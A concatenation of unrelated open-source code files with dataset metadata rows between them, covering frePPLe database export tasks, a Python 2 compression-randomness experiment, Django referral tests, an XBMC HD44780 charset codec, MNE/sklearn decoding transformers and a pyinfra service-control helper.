@PlanTaskRegistry.register
class exportBuffers(PlanTask):
description = ("Export static data", "Export buffers")
sequence = (305, "exportstatic4", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Buffer)]
def getData():
for i in frepple.buffers():
if i.hidden or (source and source != i.source):
continue
r = [
i.item.name,
i.location.name,
i.batch or None,
i.description,
round(i.onhand, 8),
round(i.minimum, 8),
i.minimum_calendar.name if i.minimum_calendar else None,
i.__class__.__name__[7:],
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into buffer
(item_id,location_id,batch,description,onhand,minimum,minimum_calendar_id,
type,category,subcategory,source,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (location_id, item_id, batch)
do update set
description=excluded.description,
onhand=excluded.onhand,
minimum=excluded.minimum,
minimum_calendar_id=excluded.minimum_calendar_id,
type=excluded.type,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportOperationMaterials(PlanTask):
description = ("Export static data", "Export operation material")
sequence = (305, "exportstatic4", 2)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(OperationMaterial)]
def getData():
for o in frepple.operations():
if o.hidden:
continue
for i in o.flows:
if i.hidden or (source and source != i.source):
continue
r = [
i.operation.name,
i.buffer.item.name,
i.effective_start
if i.effective_start != default_start
else None,
round(i.quantity, 8),
i.type[5:],
i.effective_end if i.effective_end != default_end else None,
i.name,
i.priority,
map_search[i.search]
if map_search[i.search] != "PRIORITY"
else None,
i.source,
round(i.transferbatch, 8)
if isinstance(i, frepple.flow_transfer_batch)
else None,
i.offset,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into operationmaterial
(operation_id,item_id,effective_start,quantity,type,effective_end,
name,priority,search,source,transferbatch,"offset",lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s%s)
on conflict (operation_id, item_id, effective_start)
do update set
quantity=excluded.quantity,
type=excluded.type,
effective_end=excluded.effective_end,
name=excluded.name,
priority=excluded.priority,
search=excluded.search,
source=excluded.source,
transferbatch=excluded.transferbatch,
"offset"=excluded."offset",
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportSuppliers(PlanTask):
description = ("Export static data", "Export suppliers")
sequence = (305, "exportstatic4", 3)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Supplier)]
def getData():
for i in frepple.suppliers():
if source and source != i.source:
continue
r = [
i.name,
i.description,
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.suppliers():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into supplier
(name,description,category,subcategory,source,lastmodified,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update supplier set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportItemSuppliers(PlanTask):
description = ("Export static data", "Export item suppliers")
sequence = (305, "exportstatic4", 4)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(ItemSupplier)]
def getData():
for s in frepple.suppliers():
if source and source != s.source:
continue
for i in s.itemsuppliers:
if i.hidden or (source and source != i.source):
continue
r = [
i.item.name,
i.location.name if i.location else None,
i.supplier.name,
i.effective_start
if i.effective_start != default_start
else None,
i.leadtime,
i.size_minimum,
i.size_multiple,
i.cost,
i.priority,
i.effective_end if i.effective_end != default_end else None,
i.resource.name if i.resource else None,
i.resource_qty,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into itemsupplier
(item_id,location_id,supplier_id,effective_start,leadtime,sizeminimum,
sizemultiple,cost,priority,effective_end,resource_id,resource_qty,source,
lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (item_id, location_id, supplier_id, effective_start)
do update set
leadtime=excluded.leadtime,
sizeminimum=excluded.sizeminimum,
sizemultiple=excluded.sizemultiple,
cost=excluded.cost,
priority=excluded.priority,
effective_end=excluded.effective_end,
resource_id=excluded.resource_id,
resource_qty=excluded.resource_qty,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportItemDistributions(PlanTask):
description = ("Export static data", "Export item distributions")
sequence = (305, "exportstatic4", 5)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(ItemDistribution)]
def getData():
for s in frepple.items():
if s.hidden or (source and source != s.source):
continue
for i in s.itemdistributions:
if i.hidden or (source and source != i.source):
continue
r = [
i.item.name,
i.destination.name if i.destination else None,
i.origin.name,
i.effective_start
if i.effective_start != default_start
else None,
i.leadtime,
i.size_minimum,
i.size_multiple,
i.cost,
i.priority,
i.effective_end if i.effective_end != default_end else None,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into itemdistribution
(item_id,location_id,origin_id,effective_start,leadtime,sizeminimum,
sizemultiple,cost,priority,effective_end,source,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (item_id, location_id, origin_id, effective_start)
do update set
leadtime=excluded.leadtime,
sizeminimum=excluded.sizeminimum,
sizemultiple=excluded.sizemultiple,
cost=excluded.cost,
priority=excluded.priority,
effective_end=excluded.effective_end,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
| agpl-3.0 | 6,350,968,062,602,810,000 | 35.393553 | 130 | 0.482285 | false | 4.712584 | false | false | false |
lukasschwab/code-golf | randomness-test.py | 1 | 1094 | # I want to test the randomness of a random number generator.
# How does randomness increase as you nest pseudorandom number generators?
# I thought no, but wanted to confirm for myself.
# E.g. Randomly selecting from a randomly shuffled list would be two degrees.
# Why use compression? Check this out: https://csclub.uwaterloo.ca/~mtahmed/work_reports/mtahmed_workreport_s12.pdf
# zlib is the python library that does compression.
import zlib
# and this is for randomness!
import random
digitsStr = range(0, 10)
iterations = 0
while iterations <= 100:
# This generates a random string of numbers.
uncompressedStr = ""
while len(uncompressedStr) < 200000:
repeat = 0
scrambledDigits = digitsStr
uncompressedStr += str(scrambledDigits[random.randint(0,9)])
repeat = 0
while repeat < iterations:
random.shuffle(list(uncompressedStr))
repeat += 1
uncompressedStr = ''.join(uncompressedStr)
compressedStr = zlib.compress(uncompressedStr)
randomness = float(len(compressedStr))/float(len(uncompressedStr))
print randomness
iterations = iterations+1
| mit | -2,690,453,327,420,816,000 | 29.388889 | 115 | 0.749543 | false | 3.683502 | false | false | false |
elricgit/django-social-launch | django_social_launch/tests/test_urls.py | 1 | 7742 | #Django imports
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.sessions.backends.db import SessionStore
#App imports
from .. import user_successfully_created_msg, referrer_url_session_key, referring_user_id_session_key
from ..models import SocialLaunchProfile
#Test imports
from .util import BaseTestCase
class IndexTestCase(BaseTestCase):
def test_get(self):
response = self.client.get(reverse('social_launch_index'))
self.assertEqual(response.status_code, 200)
def test_get_with_referrer(self):
referrer_url = 'http://facebook.com'
response = self.client.get(reverse('social_launch_index'), HTTP_REFERER=referrer_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.client.session[referrer_url_session_key], referrer_url)
def test_post_success_creates_new_user(self):
post_data = {'email' : '[email protected]'}
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, '')
self.assertEquals(slp.referring_user, None)
def test_post_success_creates_new_user_with_referrer(self):
referrer_url = 'http://facebook.com'
post_data = {'email' : '[email protected]'}
session = SessionStore()
session[referrer_url_session_key] = referrer_url
session[referring_user_id_session_key] = ''
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, referrer_url)
self.assertEquals(slp.referring_user, None)
def test_post_fails_invalid_email(self):
post_data = {'email' : 'fooexample.com'}
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_successfully_created_msg)
def test_post_fails_invalid_email_with_referrer(self):
referrer_url = 'http://facebook.com'
post_data = {'email' : 'fooexample.com'}
session = SessionStore()
session[referrer_url_session_key] = referrer_url
session[referring_user_id_session_key] = ''
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_successfully_created_msg)
self.assertEqual(self.client.session[referrer_url_session_key], referrer_url)
def test_post_fails_no_email(self):
post_data = {}
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_successfully_created_msg)
class ReferralTestCase(BaseTestCase):
def test_get_success(self):
response = self.client.get(reverse('social_launch_referral', kwargs={'referring_user_id' : self.user1.id}))
self.assertEqual(response.status_code, 200)
def test_get_fails_invalid_id(self):
response = self.client.get(reverse('social_launch_referral', kwargs={'referring_user_id' : 'foo'}))
self.assertEqual(response.status_code, 404)
def test_get_fails_no_such_user(self):
response = self.client.get(reverse('social_launch_referral', kwargs={'referring_user_id' : 1000}))
self.assertEqual(response.status_code, 404)
def test_post_success_creates_new_user(self):
post_data = {'email' : '[email protected]'}
session = SessionStore()
session[referring_user_id_session_key] = self.user1.id
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_referral', kwargs={'referring_user_id' : self.user1.id}), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, '')
self.assertEquals(slp.referring_user, self.user1)
def test_post_success_creates_new_user_bad_referring_used_id(self):
post_data = {'email' : '[email protected]'}
session = SessionStore()
session[referring_user_id_session_key] = 1000
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_referral', kwargs={'referring_user_id' : self.user1.id}), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, '')
self.assertEquals(slp.referring_user, None)
| bsd-3-clause | -8,356,192,776,099,714,000 | 34.513761 | 134 | 0.731465 | false | 3.212448 | true | false | false |
ajw107/script.xbmc.lcdproc | resources/lib/charset_hd44780.py | 1 | 2826 | '''
XBMC LCDproc addon
Copyright (C) 2012 Team XBMC
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import codecs
from charset_map_hd44780_a00 import *
from charset_map_hd44780_a02 import *
class HD44780_Codec(codecs.Codec):
def encode_a00(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encmap_hd44780_a00)
def encode_a02(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encmap_hd44780_a02)
def decode(self,input,errors='strict'):
pass
class HD44780_IncrementalEncoder_a00(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encmap_hd44780_a00)[0]
class HD44780_IncrementalEncoder_a02(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encmap_hd44780_a02)[0]
class HD44780_IncrementalDecoder(codecs.IncrementalDecoder):
pass
class HD44780_StreamWriter(HD44780_Codec,codecs.StreamWriter):
pass
class HD44780_StreamReader(HD44780_Codec,codecs.StreamReader):
pass
def charset_hd44780(name):
if name == "hd44780-a00":
return codecs.CodecInfo(
name = "hd44780-a00",
encode = HD44780_Codec().encode_a00,
decode = HD44780_Codec().decode,
incrementalencoder = HD44780_IncrementalEncoder_a00,
incrementaldecoder = HD44780_IncrementalDecoder,
streamreader = HD44780_StreamReader,
streamwriter = HD44780_StreamWriter,
)
elif name == "hd44780-a02":
return codecs.CodecInfo(
name = "hd44780-a02",
encode = HD44780_Codec().encode_a02,
decode = HD44780_Codec().decode,
incrementalencoder = HD44780_IncrementalEncoder_a02,
incrementaldecoder = HD44780_IncrementalDecoder,
streamreader = HD44780_StreamReader,
streamwriter = HD44780_StreamWriter,
)
else:
return None
| gpl-2.0 | -5,305,902,910,726,653,000 | 35.701299 | 75 | 0.703822 | false | 3.844898 | false | false | false |
kingjr/jr-tools | jr/gat/transformers.py | 1 | 14857 | import numpy as np
from sklearn.base import TransformerMixin, BaseEstimator, clone
from sklearn.linear_model import LogisticRegression
from mne.parallel import parallel_func
from nose.tools import assert_true
class _BaseEstimator(BaseEstimator, TransformerMixin):
def fit(self, X, y=None):
return self
def fit_transform(self, X, y=None):
return self.fit(X, y).transform(X)
def baseline(X, mode, tslice):
if X.shape[-1] > 0:
mean = np.mean(X[..., tslice], axis=-1)[..., None]
else:
mean = 0 # otherwise we get an ugly nan
if mode == 'mean':
X -= mean
if mode == 'logratio':
X /= mean
X = np.log10(X) # a value of 1 means 10 times bigger
if mode == 'ratio':
X /= mean
elif mode == 'zscore':
std = np.std(X[..., tslice], axis=-1)[..., None]
X -= mean
X /= std
elif mode == 'percent':
X -= mean
X /= mean
elif mode == 'zlogratio':
X /= mean
X = np.log10(X)
std = np.std(X[..., tslice], axis=-1)[..., None]
X /= std
return X
class EpochsBaseliner(_BaseEstimator):
def __init__(self, tslice=None, mode='mean'):
self.mode = mode
self.tslice = slice(None) if tslice is None else tslice
assert_true(self.mode in ['mean', 'logratio', 'ratio', 'zscore',
'percent', 'zlogratio'])
assert_true(isinstance(self.tslice, (slice, int)))
def transform(self, X):
return baseline(X, self.mode, self.tslice)
class TimeFreqBaseliner(_BaseEstimator):
def __init__(self, tslice=None, mode='mean'):
self.mode = mode
self.tslice = slice(None) if tslice is None else tslice
assert_true(self.mode in ['mean', 'logratio', 'ratio', 'zscore',
'percent', 'zlogratio'])
def transform(self, X):
return baseline(X, self.mode, self.tslice)
class TimePadder(_BaseEstimator):
"""Padd time before and after epochs"""
def __init__(self, n_sample, value=0.):
self.n_sample = n_sample
assert_true(isinstance(self.n_sample, int))
self.value = value
assert_true(isinstance(value, (int, float)) or (value == 'median'))
def transform(self, X):
if self.value == 'median':
coefs = np.median(X, axis=2)
else:
coefs = self.value * np.ones(X.shape[:2])
coefs = np.tile(coefs, [self.n_sample, 1, 1]).transpose([1, 2, 0])
X = np.concatenate((coefs, X, coefs), axis=2)
return X
def inverse_transform(self, X):
X = X[:, :, self.n_sample:-self.n_sample]
return X
class TimeSelector(_BaseEstimator):
"""Padd time before and after epochs"""
def __init__(self, tslice):
self.tslice = tslice
assert_true(isinstance(self.tslice, (slice, int)))
def fit_transform(self, X, y=None):
return self.transform(X)
def transform(self, X):
X = X[:, :, self.tslice]
return X
class TimeFreqSelector(_BaseEstimator):
"""Padd time before and after epochs"""
def __init__(self, tslice=None, fslice=None):
self.tslice = slice(None) if tslice is None else tslice
self.fslice = slice(None) if fslice is None else fslice
assert_true(isinstance(self.tslice, (slice, int)))
assert_true(isinstance(self.fslice, (slice, int)))
def fit_transform(self, X, y=None):
return self.transform(X)
def transform(self, X):
X = X[:, :, :, self.tslice]
X = X[:, :, self.fslice, :]
return X
class MyXDawn(_BaseEstimator):
"""Wrapper for pyriemann Xdawn + robust.
Will eventually need to clean both MNE and pyriemann with refactorings"""
def __init__(self, n_filter=4, estimator='scm'):
from pyriemann.estimation import Xdawn
self.n_filter = n_filter
assert_true(isinstance(self.n_filter, int))
self.estimator = estimator
assert_true(isinstance(estimator, str))
self._xdawn = Xdawn(nfilter=n_filter, estimator=estimator)
def fit(self, X, y):
# only apply on channels who std > 0 across time on at least one trial
self.picks_ = np.where(np.mean(np.std(X, axis=2) ** 2, axis=0))[0]
self._xdawn.fit(X[:, self.picks_, :], y)
return self
def transform(self, X):
return self._xdawn.transform(X[:, self.picks_, :])
def fit_transform(self, X, y=None):
self.fit(X, y)
return self.transform(X)
class SpatialFilter(_BaseEstimator):
def __init__(self, estimator):
self.estimator = estimator
assert_true(isinstance(estimator, TransformerMixin))
def fit(self, X, y=None):
n_epoch, n_chan, n_time = X.shape
# trial as time
X = np.transpose(X, [1, 0, 2]).reshape([n_chan, n_epoch * n_time]).T
self.estimator.fit(X)
return self
def fit_transform(self, X, y=None):
self.fit(X)
return self.transform(X)
def transform(self, X):
n_epoch, n_chan, n_time = X.shape
# trial as time
X = np.transpose(X, [1, 0, 2]).reshape([n_chan, n_epoch * n_time]).T
X = self.estimator.transform(X)
X = np.reshape(X.T, [-1, n_epoch, n_time]).transpose([1, 0, 2])
return X
class Reshaper(_BaseEstimator):
"""Transpose, concatenate and/or reshape data.
Parameters
----------
concatenate : int | None
Reshaping feature dimension e.g. np.concatenate(X, axis=concatenate).
Defaults to None.
transpose : array of int, shape(1 + n_dims) | None
Reshaping feature dimension e.g. X.transpose(transpose).
Defaults to None.
reshape : array, shape(n_dims) | None
Reshaping feature dimension e.g. X.reshape(np.r_[len(X), shape]).
Defaults to -1 if concatenate or transpose is None, else defaults
to None.
"""
def __init__(self, reshape=None, transpose=None, concatenate=None,
verbose=False):
if (reshape is None) and (transpose is None) and (concatenate is None):
reshape = [-1]
self.reshape = reshape
self.transpose = transpose
self.concatenate = concatenate
self.verbose = verbose
def fit(self, X, y=None):
self.shape_ = X.shape[1:]
return self
def fit_transform(self, X, y=None):
return self.fit(X, y).transform(X)
def transform(self, X, y=None):
if self.transpose is not None:
X = X.transpose(self.transpose)
if self.concatenate:
X = np.concatenate(X, self.concatenate)
if self.reshape is not None:
X = np.reshape(X, np.hstack((X.shape[0], self.reshape)))
if self.verbose:
print(self.shape_, '->', (X.shape[1:]))
return X
class LightTimeDecoding(_BaseEstimator):
def __init__(self, estimator=None, method='predict', n_jobs=1):
self.estimator = (LogisticRegression() if estimator is None
else estimator)
self.method = method
assert_true(self.method in ['predict', 'predict_proba'])
assert_true(hasattr(self.estimator, method))
self.n_jobs = n_jobs
assert_true(isinstance(self.n_jobs, int))
def fit_transform(self, X, y):
return self.fit(X, y).transform(X)
def fit(self, X, y):
self.estimators_ = list()
parallel, p_func, n_jobs = parallel_func(_fit, self.n_jobs)
estimators = parallel(
p_func(self.estimator, split, y)
for split in np.array_split(X, n_jobs, axis=2))
self.estimators_ = np.concatenate(estimators, 0)
return self
def transform(self, X):
parallel, p_func, n_jobs = parallel_func(_predict_decod, self.n_jobs)
X_splits = np.array_split(X, n_jobs, axis=2)
est_splits = np.array_split(self.estimators_, n_jobs)
y_pred = parallel(
p_func(est_split, x_split, self.method)
for (est_split, x_split) in zip(est_splits, X_splits))
if n_jobs > 1:
y_pred = np.concatenate(y_pred, axis=1)
else:
y_pred = y_pred[0]
return y_pred
def predict(self, X):
return self.transform(X)
def predict_proba(self, X):
return self.transform(X)
def _fit(estimator, X, y):
estimators_ = list()
for ii in range(X.shape[2]):
est = clone(estimator)
est.fit(X[:, :, ii], y)
estimators_.append(est)
return estimators_
def _predict_decod(estimators, X, method):
n_sample, n_chan, n_time = X.shape
y_pred = np.array((n_sample, n_time))
for ii, est in enumerate(estimators):
if method == 'predict':
_y_pred = est.predict(X[:, :, ii])
elif method == 'predict_proba':
_y_pred = est.predict_proba(X[:, :, ii])
# init
if ii == 0:
y_pred = _init_pred(_y_pred, X)
y_pred[:, ii, ...] = _y_pred
return y_pred
def _init_pred(y_pred, X):
n_sample, n_chan, n_time = X.shape
if y_pred.ndim == 2:
y_pred = np.zeros((n_sample, n_time, y_pred.shape[-1]))
else:
y_pred = np.zeros((n_sample, n_time))
return y_pred
class LightGAT(LightTimeDecoding):
def transform(self, X):
parallel, p_func, n_jobs = parallel_func(_predict_gat, self.n_jobs)
y_pred = parallel(
p_func(self.estimators_, x_split, self.method)
for x_split in np.array_split(X, n_jobs, axis=2))
y_pred = np.concatenate(y_pred, axis=2)
return y_pred
def _predict_gat(estimators, X, method):
n_sample, n_chan, n_time = X.shape
for ii, est in enumerate(estimators):
X_stack = np.transpose(X, [1, 0, 2])
X_stack = np.reshape(X_stack, [n_chan, n_sample * n_time]).T
if method == 'predict':
_y_pred = est.predict(X_stack)
_y_pred = np.reshape(_y_pred, [n_sample, n_time])
elif method == 'predict_proba':
_y_pred = est.predict_proba(X_stack)
n_dim = _y_pred.shape[-1]
_y_pred = np.reshape(_y_pred, [n_sample, n_time, n_dim])
# init
if ii == 0:
y_pred = _init_pred_gat(_y_pred, X, len(estimators))
y_pred[:, ii, ...] = _y_pred
return y_pred
def _init_pred_gat(y_pred, X, n_train):
n_sample, n_chan, n_time = X.shape
if y_pred.ndim == 3:
y_pred = np.zeros((n_sample, n_train, n_time, y_pred.shape[-1]))
else:
y_pred = np.zeros((n_sample, n_train, n_time))
return y_pred
class CustomEnsemble(TransformerMixin):
def __init__(self, estimators, method='predict'):
self.estimators = estimators
self.method = method
assert_true(method in ['predict', 'predict_proba'])
def fit(self, X, y=None):
for estimator in self.estimators:
estimator.fit(X, y)
return self
def fit_transform(self, X, y=None):
self.fit(X, y)
return self.transform(X)
def transform(self, X):
all_Xt = list()
for estimator in self.estimators:
if self.method == 'predict':
Xt = estimator.predict(X)
elif self.method == 'predict_proba':
Xt = estimator.predict_proba(X)
all_Xt.append(Xt)
all_Xt = np.c_[all_Xt].T
return all_Xt
def get_params(self, deep=True):
return dict(estimators=self.estimators, method=self.method)
class GenericTransformer(_BaseEstimator):
def __init__(self, function, **fit_params):
self.function = function
self.fit_params = fit_params
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
return self.function(X, **self.fit_params)
def fit_transform(self, X, y=None):
return self.transform(X, y)
class TimeEmbedder(_BaseEstimator):
def __init__(self, delays=2):
self.delays = delays
def transform(self, X, y=None):
if not isinstance(X, np.ndarray):
epochs = X
X = epochs._data
if isinstance(self.delays, int):
delays = range(1, self.delays)
else:
delays = self.delays
X2 = []
for x in X:
tmp = x
for d in delays:
tmp = np.r_[tmp, np.roll(x, d, axis=-1)]
X2.append(tmp)
X2 = np.array(X2)
return X2
def fit_transform(self, X, y=None):
return self.fit(X).transform(X, y)
class Windower(TransformerMixin, BaseEstimator):
"""To make sliding windows
Parameters
----------
size : int
The window size.
step : int
The window step.
vectorize : bool
Returns arrays or vector.
"""
def __init__(self, size=1, step=1, vectorize=False):
self.size = size
self.step = step
self.vectorize = vectorize
def fit(self, X, y=None):
"""Does nothing, for sklearn compatibility purposes
Parameters
----------
X : ndarray, shape(n_epochs, n_times, n_features)
The target data.
y : None | array, shape(n_epochs,)
Returns
-------
self : self
"""
if X.ndim != 3:
raise ValueError('expects 3D array')
return self
def transform(self, X, y=None):
"""Generate windows from X.
Parameters
----------
X : ndarray, shape(n_epochs, n_times, n_features)
The target data.
y : None | array, shape(n_epochs,)
Returns
-------
Xt : ndarray, shape(n_epochs, n_features, n_window_times, n_windows)
The transformed data. If vectorize is True, then shape is
(n_epochs, -1).
"""
Xt = list()
for time in range(0, X.shape[2] - self.size, self.step):
Xt.append(X[:, :, time:(time + self.size)])
Xt = np.transpose(Xt, [1, 2, 3, 0]) # trial chan window time
if self.vectorize:
Xt = Xt.reshape([len(Xt), -1, Xt.shape[-1]])
return Xt
def fit_transform(self, X, y=None):
"""Generate windows from X.
Parameters
----------
X : ndarray, shape(n_epochs, n_times, n_features)
The target data.
y : None | array, shape(n_epochs,)
Returns
-------
Xt : ndarray, shape(n_epochs, n_features, n_window_times, n_windows)
The transformed data. If vectorize is True, then shape is
(n_epochs, -1).
"""
return self.fit(X).transform(X)
def test_windower():
Windower(3, 2, False).transform(np.zeros((2, 30, 100))).shape
| bsd-2-clause | -8,381,013,809,890,856,000 | 29.823651 | 79 | 0.558053 | false | 3.511463 | false | false | false |
Fizzadar/pyinfra | pyinfra/operations/util/service.py | 1 | 2358 | def handle_service_control(
host,
name, fact_cls, formatter, running, restarted, reloaded, command,
status_argument='status',
):
statuses = host.get_fact(fact_cls)
status = statuses.get(name, None)
# If we don't know the status, we need to check if it's up before starting
# and/or restarting/reloading
if status is None:
yield '''
# If the service is running
if {status_command}; then
{stop_command}
{restart_command}
{reload_command}
# If the service is not running, we just start it (no re[start|load])
else
{start_command}
fi
'''.format(
status_command=formatter.format(name, status_argument),
start_command=(
formatter.format(name, 'start')
if running is True else 'true'
),
stop_command=(
formatter.format(name, 'stop')
if running is False else 'true'
),
restart_command=(
formatter.format(name, 'restart')
if restarted else 'true'
),
reload_command=(
formatter.format(name, 'reload')
if reloaded else 'true'
),
)
statuses[name] = running
else:
# Need down but running
if running is False:
if status:
yield formatter.format(name, 'stop')
statuses[name] = False
else:
host.noop('service {0} is stopped'.format(name))
# Need running but down
if running is True:
if not status:
yield formatter.format(name, 'start')
statuses[name] = True
else:
host.noop('service {0} is running'.format(name))
# Only restart if the service is already running
if restarted and status:
yield formatter.format(name, 'restart')
